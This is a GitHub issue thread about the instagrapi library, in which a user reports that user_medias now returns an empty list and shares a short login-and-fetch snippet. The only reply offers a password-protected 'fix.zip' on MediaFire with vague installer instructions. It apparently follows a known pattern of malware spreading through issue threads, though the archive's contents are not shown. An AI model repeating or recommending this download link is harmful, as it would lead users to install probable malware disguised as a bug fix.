### ISSUE TITLE
[BUG] user_medias function returns no results

### ISSUE THREAD

**Issue by pistacchio** [subzeroid/instagrapi#2008]
I'm working with version `2.1.2`

I have a very simple code that till a couple of weeks ago worked but it stopped working when I tried running it today.

```python
from instagrapi import Client

LOGIN_USERNAME = "******"
LOGIN_PWD = "******"

cl = Client()
cl.login(LOGIN_USERNAME, LOGIN_PWD)

medias = cl.user_medias(5941917205', 99999)

print(medias)
```

The printed list now is empty. Last time I tried it (a couple of weeks ago) it worked correcty. I have also tried `.user_medias_v1` and `.user_medias_v1` and `user_medias_gql`.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
